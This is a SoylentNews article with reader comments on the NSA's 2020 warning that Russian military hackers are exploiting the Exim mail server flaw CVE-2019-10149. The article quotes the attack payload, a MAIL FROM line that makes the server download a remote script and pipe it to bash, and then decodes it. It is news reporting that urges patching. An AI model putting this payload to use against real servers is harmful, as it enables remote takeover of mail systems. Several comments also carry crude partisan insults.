Stories
Slash Boxes
Comments

SoylentNews is people

posted by Fnord666 on Saturday May 30 2020, @03:23PM   Printer-friendly
from the patch-your-servers-now! dept.

It's not every day the NSA publicly warns of attacks by Kremlin hackers – so take this critical Exim flaw seriously:

The NSA has raised the alarm over what it says is Russia's active exploitation of a remote-code execution flaw in Exim for which a patch exists.

The American surveillance super-agency said [PDF] on Thursday the Kremlin's military intelligence hackers are actively targeting some systems vulnerable to CVE-2019-10149, a security hole in the widely used Exim mail transfer agent (MTA) that was fixed last June.

Here's a sample of Moscow's exploit code, according to the NSA, which is sent to a vulnerable server to hijack it – we've censored parts of it to avoid tripping any filters:

MAIL FROM:${run{\x2Fbin\x2Fsh\t- c\t\x22exec\x20\x2Fusr\x2Fbin\x2Fwget\x20\x2DO\x20\x2D\x20hxxp\:\x2F\x2F\hostapp.be\x2Fscript1.sh\x20\x7C\x20bash\x22}}@hostapp.be That hexadecimal decodes to: /bin/sh -c "exec /usr/bin/wget -O - hxxp://hostapp.be/script1.sh | bash"

"The Russian actors, part of the General Staff Main Intelligence Directorate's (GRU) Main Center for Special Technologies (GTsST), have used this exploit to add privileged users, disable network security settings, execute additional scripts for further network exploitation; pretty much any attacker's dream access – as long as that network is using an unpatched version of Exim MTA," the NSA said.

In this case, miscreants, linked to the military-backed Sandworm operation, exploit improper validation of the recipient's address in Exim's deliver_message() function in /src/deliver.c to inject and execute a shell command, which downloads and runs another script to commandeer the server. An in-depth technical description of the programming blunder can be found here by Qualys, which found and reported the flaw last year.

Because Exim is widely used on millions of Linux and Unix servers for mail, bugs in the MTA are by nature public-facing and pose an attractive target for hackers of all nations.

The NSA did not say who exactly was being targeted, though we can imagine the Russian military takes an interest in probing foreign government agencies and vital industries. GRU hackers have also previously targeted energy utilities, by some reports.

Previously: 400,000 Servers Using Exim May be at Risk of Serious Code-Execution Attacks


Original Submission

Related Stories

400,000 Servers Using Exim May be at Risk of Serious Code-Execution Attacks 24 comments

A bug in an obscure but widely used email program may be putting as many as 400,000 servers around the world at risk of serious attack until they install an update.

The flaw—which is in all releases of the Exim message transfer agent except for version 4.90.1—opens servers to attacks that can execute malicious code, researchers who discovered the vulnerability warned in an advisory published Tuesday. The buffer overflow vulnerability, which is indexed as CVE-2018-6789, resides in base64 decode function. By sending specially manipulated input to a server running Exim, attackers may be able to remotely execute code.


Original Submission

This discussion has been archived. No new comments can be posted.
Display Options Threshold/Breakthrough Mark All as Read Mark All as Unread
The Fine Print: The following comments are owned by whoever posted them. We are not responsible for them in any way.
(1)
  • (Score: 3, Insightful) by Mojibake Tengu on Saturday May 30 2020, @03:41PM (8 children)

    by Mojibake Tengu (8598) on Saturday May 30 2020, @03:41PM (#1001033) Journal

    the flaw was introduced in Exim 4.87 and patched back in June of 2019

    So, the maybe-Russians are working with a maybe-NSA backdoor introduced in April 6, 2016, which was already fixed about a year ago, right?
    What we really need to know is the name of the guy who created the backdoor.
    Because, now we need to check everything this guy did.

    --
    Respect Authorities. Know your social status. Woke responsibly.
    • (Score: 0) by Anonymous Coward on Saturday May 30 2020, @04:19PM

      by Anonymous Coward on Saturday May 30 2020, @04:19PM (#1001053)

      https://www.qualys.com/2019/06/05/cve-2019-10149/return-wizard-rce-exim.txt [qualys.com] :

      Because expand_string() recognizes the "${run{<command> <args>}}" expansion item,

      What more need be said?! *FACEPALM*

    • (Score: 0, Informative) by Anonymous Coward on Saturday May 30 2020, @04:59PM (6 children)

      by Anonymous Coward on Saturday May 30 2020, @04:59PM (#1001067)

      Who to blame? Please! This is the continuing DNC fairy tale, scapegoating their way to victory!

      • (Score: 1, Insightful) by Anonymous Coward on Saturday May 30 2020, @05:02PM (1 child)

        by Anonymous Coward on Saturday May 30 2020, @05:02PM (#1001068)

        You may joke, but that was my first, second, and third thought. Probably still leaning that way. I'm not kidding -- there's a Boy Who Cried Wolf issue here and Democrats, the legacy media, and their compadres in the Executive branch police and surveillance agencies are 100% at fault.

        • (Score: -1, Offtopic) by Anonymous Coward on Saturday May 30 2020, @05:50PM

          by Anonymous Coward on Saturday May 30 2020, @05:50PM (#1001090)

          Shit, they're rejecting the narrative. I know you're reading this, Bob. I told you so! We should have gone with clowncels instead.

      • (Score: 5, Touché) by ilPapa on Saturday May 30 2020, @05:52PM (3 children)

        by ilPapa (2366) on Saturday May 30 2020, @05:52PM (#1001091) Journal

        Who to blame? Please! This is the continuing DNC fairy tale, scapegoating their way to victory!

        You dumb sonofabitch. Donald Trump is now in charge of the NSA.

        --
        You are still welcome on my lawn.
        • (Score: 0, Insightful) by Anonymous Coward on Saturday May 30 2020, @06:44PM (1 child)

          by Anonymous Coward on Saturday May 30 2020, @06:44PM (#1001106)

          >> You dumb sonofabitch. Donald Trump is now in charge of the NSA.

          You dumb sonofabitch. In Soviet America, the GRU is now in charge of Donald Trump.

          • (Score: 0) by Anonymous Coward on Saturday May 30 2020, @08:35PM

            by Anonymous Coward on Saturday May 30 2020, @08:35PM (#1001150)

            Bastards. First the filthy, dirty, BO stink of the Incelabteilung murders Rosa Luxemburg, then grues eat Leon Trotsky, and now the Incelabteilung is in cahoots with the grues!

            Only Lysol and fluorescent lights can solve this!

        • (Score: 0) by Anonymous Coward on Wednesday June 03 2020, @01:41AM

          by Anonymous Coward on Wednesday June 03 2020, @01:41AM (#1002538)

          Okay, so, that makes them what? good? or evil?

  • (Score: 1) by RandomFactor on Saturday May 30 2020, @03:45PM (7 children)

    by RandomFactor (3682) Subscriber Badge on Saturday May 30 2020, @03:45PM (#1001037) Journal

    Although hardly universal, many of the 'at risk' systems will be behind perfectly capable email security layers (Proofpoint, Barracuda, Mimecast, EOP, GSuite etc.) which would have blocked this within hours or days of the original disclosure.
     
    This is going to primarily apply to individuals and smaller organizations without strong IT security policies and guidelines for application development and deployment pertaining to email.

    --
    В «Правде» нет известий, в «Известиях» нет правды
    • (Score: 0) by Anonymous Coward on Saturday May 30 2020, @05:05PM (1 child)

      by Anonymous Coward on Saturday May 30 2020, @05:05PM (#1001070)

      anyone who uses that disgusting list of glorified spyware is a ridiculous suited whore.

      • (Score: 1) by RandomFactor on Saturday May 30 2020, @06:27PM

        by RandomFactor (3682) Subscriber Badge on Saturday May 30 2020, @06:27PM (#1001101) Journal

        Large scale environments do tend to be run by suits. Not saying they have to be, but it is certainly the norm.
         
        And yes, tearing in transit emails apart every conceivable way and analyzing, sandboxing and doing real-time analytics tracking and reporting of attacks is fundamentally not something conducive to perfect privacy, even with contractual obligations and privacy certifications typically in place. I listed some industry leaders in the space (there are many others depending on acceptable capabilities - Intel, Forcepoint, Cisco, Trend, Area 1...)
         
        What to you recommend that better protects privacy and retains capabilities necessary to properly protect large organizations at this layer?

        --
        В «Правде» нет известий, в «Известиях» нет правды
    • (Score: 0) by Anonymous Coward on Saturday May 30 2020, @07:19PM (1 child)

      by Anonymous Coward on Saturday May 30 2020, @07:19PM (#1001120)

      Although hardly universal, many of the 'at risk' systems will be behind perfectly capable email security layers (Proofpoint, Barracuda, Mimecast, EOP, GSuite etc.) which would have blocked this within hours or days of the original disclosure...

      Sits here, watching all the dubious traffic from Russia (and, surprisingly, the Seychelles) getting shitcanned within 2-5 seconds of anyone trying this exploit...not that it matters, as my Exim installs are up to date. And no, it's not a commercial 'security layer'.

      This is going to primarily apply to individuals and smaller organizations without strong IT security policies and guidelines for application development and deployment pertaining to email.

      I detect the spoor of suitery here, so you might find this story amusing. I once cobbled together a reactive firewall setup which usually detected & blocked dubious traffic based on content or pattern within two seconds, we were approached by a couple of suited wonks who somehow gained knowledge of the setup (I still, to this day, don't know who leaked, I have my suspicions that it was one of the local CERT mob...they'd tried penetrating our little section of the network so many times), to say their faces fell with the realisation that all the code driving this, bar the Perl 'glue' code, that, thanks to my contract, belonged to my employer, was all GPL, so they couldn't buy it off us...(for added fun fact points relevant to the article, this setup used Exim listening on a non-standard port for alert passing between remote sites, dodgy traffic identified at site A?, sites B,C..X got the message and blocked the meddlesome bastards before they got to them)

      That was 20 years ago, my current setup is the spiritual descendant of that one (different hardware and OS configuration, and, obviously I don't work where I set that one up, so the code isn't the same), the reason the reaction time is greater than two seconds is down to the fact I'm running it on old hardware, the reason I'm running it on old hardware is that the bloody hardware is more reliable (last uptime before I moved the setup, just over two years.).

      I do not work for a larger organisation..as such, I don't have to put up with the BS that goes with working for said larger organisations, I get to spend a lot more of my time actually keeping shit patched and secure without having to sit on my arse waiting for a magically blessed corporate solution to appear...speaking of which, I have another story here about a system-wide virus infection that the paid-for 'email security layer' at one place of employ allowed in through the thus protected email and merrily started infesting everything it could on the shared corporate drives, it had flagged up on my monitoring as, being a sneaky cunt, I had a world read-write samba share on a linux box with a couple of exe and doc files with an alert generated if they were altered, and which IP number (and domain user) altered them, the logs were fun that day, and the next, and the day after...
      I warned the domain admin something was going on...one week later, the software finally gets the update which detects the infection, by this time it had managed to infect almost all the machines within the organisation, almost all, that is, excluding the ones I was responsible for.
      Pity it had gotten to the finance machines, pity one of the finance team had admin rights...

      • (Score: 1) by RandomFactor on Saturday May 30 2020, @10:31PM

        by RandomFactor (3682) Subscriber Badge on Saturday May 30 2020, @10:31PM (#1001194) Journal

        Yeah, we are talking about entirely different worlds that require very different capabilities to protect.
         
        There is a cocktail of methods that are used for protecting larger organizations with the typical diversity of systems, mailers, clients, users, patch levels, usage cases, & traffic profiles.
         
        For perspective, some of these are:
         
          - Sandboxing incoming files and looking for bad behavior,
          - scraping emails for passwords contained within them and using those to decrypt and sandbox,
          - scanning links for malicious sites of various sorts (credential phishing, malicious downloads)
          - Spoofing, Impersonation and BEC attacks
          - Sender reputation tracking
          - re-scanning links periodically in case the bad guys change the site to be malicious after delivery
          - Tracking emails determined to be malicious post delivery and pulling them from the mailboxes they were delivered to
          - - Following any forwarding or replies within the organization and removing those copies as well
          - Generating alerts on individuals that threats were delivered to
          - Tracking which users actually interacted with threat sites
          - Quarantining blocked emails and allowing direct user interaction to (safely) examine and release blocked emails,
          - Integration with other tools in the environment
          - - allow simulation malicious emails to train users
          - - If a link is bad block it at the firewalls/proxy
          - - block bad files from execution on workstations
          - allow end users to report and individually block spam and malware,
          - Scan OUTBOUND email to capture email, alert, and block if an internal user gets popped
          - Track and report on trends, attackers, campaigns in use against the organization
         
        And these capabilities need to be updated approaching real time.

        --
        В «Правде» нет известий, в «Известиях» нет правды
    • (Score: 0) by Anonymous Coward on Saturday May 30 2020, @07:34PM (2 children)

      by Anonymous Coward on Saturday May 30 2020, @07:34PM (#1001126)

      This is going to primarily apply to individuals and smaller organizations without strong IT security policies and guidelines for application development and deployment pertaining to email.

      But not to those who use sendmail [wikipedia.org] or postfix [wikipedia.org] instead of exim.

      • (Score: 1) by RandomFactor on Saturday May 30 2020, @08:11PM (1 child)

        by RandomFactor (3682) Subscriber Badge on Saturday May 30 2020, @08:11PM (#1001142) Journal

        Ahhh for a business that only used one standard bit of kit globally :-p

        --
        В «Правде» нет известий, в «Известиях» нет правды
        • (Score: 0) by Anonymous Coward on Sunday May 31 2020, @12:12AM

          by Anonymous Coward on Sunday May 31 2020, @12:12AM (#1001227)

          Ahhh for a business that only used one standard bit of kit globally :-p

          In this case, as long as it's not exim [wikipedia.org], it's all good.

  • (Score: 1, Insightful) by Anonymous Coward on Saturday May 30 2020, @03:54PM

    by Anonymous Coward on Saturday May 30 2020, @03:54PM (#1001040)

    Anyone who haven't updated since that bug was published is already hacked by someone else. That warning seems useless.

  • (Score: 1, Troll) by Anonymous Coward on Saturday May 30 2020, @04:56PM (2 children)

    by Anonymous Coward on Saturday May 30 2020, @04:56PM (#1001065)

    Oh brother! Gremlins, little green men. Damn democrats will do anything to keep this stupid game running. Trump is about to be reelected and they still haven't found a replacement

    The NSA. They were soooo evil before 2016. What happened?

    • (Score: 0, Informative) by Anonymous Coward on Saturday May 30 2020, @06:54PM (1 child)

      by Anonymous Coward on Saturday May 30 2020, @06:54PM (#1001108)

      >> Trump is about to be reelected and they still haven't found a replacement

      Sure they have... they've got that old man who can't remember his email password (ensuring no repeat of HillaryGate) and his running mate the Minnesota woman who hates blacks.

      • (Score: 1, Insightful) by Anonymous Coward on Saturday May 30 2020, @07:43PM

        by Anonymous Coward on Saturday May 30 2020, @07:43PM (#1001129)

        >> Trump is about to be reelected and they still haven't found a replacement

        Sure they have... they've got that old man who can't remember his email password (ensuring no repeat of HillaryGate) and his running mate the Minnesota woman who hates blacks.

        Given that the polls show Ds out in front [fivethirtyeight.com], including Biden vs. Trump [270towin.com] in pretty much every battleground state, I'm not sure where GP gets the idea that Trump is a sure thing.

        That's weird, I didn't realize that Stacy Abrams [wikipedia.org] was from Minnesota, or that she doesn't like blacks. Perhaps she just prefers fucking white men (or women, or both)?

        And just because you prefer fucking a particular type, it doesn't mean you *hate* those who aren't that type. Besides, what does a candidate's sex life have to do with anything?

  • (Score: 0) by Anonymous Coward on Saturday May 30 2020, @07:49PM

    by Anonymous Coward on Saturday May 30 2020, @07:49PM (#1001135)

    Unlike exim, Russian hackers can't use vi for nefarious purposes.

  • (Score: 3, Informative) by Pav on Saturday May 30 2020, @10:39PM

    by Pav (114) on Saturday May 30 2020, @10:39PM (#1001197)

    Perhaps Russian hackers attached to the kremlin DID do this... but because this story seems to mesh with a certain narrative, and because of that context I thought I'd mention significant LEFT critiques of Russiagate posted recently - this issue is not strictly divided along partisan lines as many would like us to believe.

    Glenn Greenwald from The Intercept, a journalist who broke the Snowden story and who has enough of a legal background to have insight into issues of law comments on the Flynn case an the wider Russiagate context [youtube.com].

    Aaron Mate and Matt Taibbi [youtube.com], both winners of the I.F "Izzy" Stone independent journalism award, published at The Hill, The Nation and many other left publications also discuss the Flynn case and Russiagate.

  • (Score: -1, Troll) by Anonymous Coward on Sunday May 31 2020, @12:19AM

    by Anonymous Coward on Sunday May 31 2020, @12:19AM (#1001229)

    The sneaky Russians had the virus infect a fat white cop, forcing him to sit on George Floyd's neck. Now the USA is going to collapse as African-Americans give whitey what's coming to him... Atlanta burns. LA burns. Seattle burns. St Greta is conflicted with sudden racist thoughts when she realizes how much carbon is being released today.

(1)